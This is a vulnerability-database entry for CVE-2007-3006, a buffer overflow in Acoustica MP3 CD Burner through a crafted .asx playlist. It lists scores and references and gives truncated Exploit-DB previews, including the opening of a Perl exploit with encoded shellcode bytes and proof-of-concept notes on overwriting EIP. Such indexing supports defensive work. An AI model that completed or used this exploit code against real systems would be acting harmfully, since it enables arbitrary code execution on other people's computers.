CVE-2007-3006
published 2007-06-04CVE-2007-3006: Buffer overflow in Acoustica MP3 CD Burner 4.32 allows user-assisted remote attackers to execute arbitrary code via a .asx playlist file with a REF element…
PriorityP428medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
8.09%
94.1th percentile
Buffer overflow in Acoustica MP3 CD Burner 4.32 allows user-assisted remote attackers to execute arbitrary code via a .asx playlist file with a REF element containing a long string in the HREF attribute. NOTE: it was later claimed that 4.51 Build 147 is also affected.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| acoustica | acoustica_mp3_cd_burner | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow
exploitdb·2008-08-29
CVE-2007-3006 Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow
Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow
---
#!/usr/bin/perl
#
# Acoustica MP3 CD Burner (asx file) Local BOF Exploit
# Author: Koshi
#
# Date: 08-29-08 ( 0day )
# Application: Acoustica MP3 CD Burner
# Version: 4.51 Build 147 ( possibly older )
# Site: http://acoustica.com/download.htm
# Tested On: Windows XP SP3 Fully Patched
#
# Based off of n00b's findings http://www.milw0rm.com/exploits/4017
# gr33tz: Rima my baby, str0ke, n00b ( nice find )
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
"\x41
Exploit-DB
Acoustica MP3 CD Burner 4.32 - Local Buffer Overflow (PoC)
exploitdb·2007-05-31
CVE-2007-3006 Acoustica MP3 CD Burner 4.32 - Local Buffer Overflow (PoC)
Acoustica MP3 CD Burner 4.32 - Local Buffer Overflow (PoC)
---
/*
Credit's to n00b for finding this bug and poc..
Acoustica MP3 CD Burner 4.32 local buffer-overflow poc code.
Date : May 31'st 2007
Tested:On win xp sp 2.
Acoustica Is prone to a buffer-overflow when parasing a .asx playlist file
If you can entice some one to open a specialy crafted .asx play list file it
is possible to run shell-code.This issue occurs because the applications fail
to properly check boundaries on user-supplied data before copying it to an
insufficiently sized memory buffer.If we open it up in olly and pass the
specially crafted .asx we will see at first we can control the eax registers
also ecx gets overwritten if we pass exception the eip is over written .
I will try and write a loacal exploit in a few da
No writeups or analysis indexed.
http://osvdb.org/43455http://secunia.com/advisories/31666http://www.securityfocus.com/bid/24247https://exchange.xforce.ibmcloud.com/vulnerabilities/34647https://www.exploit-db.com/exploits/4017https://www.exploit-db.com/exploits/6329http://osvdb.org/43455http://secunia.com/advisories/31666http://www.securityfocus.com/bid/24247https://exchange.xforce.ibmcloud.com/vulnerabilities/34647https://www.exploit-db.com/exploits/4017https://www.exploit-db.com/exploits/6329
2007-06-04
Published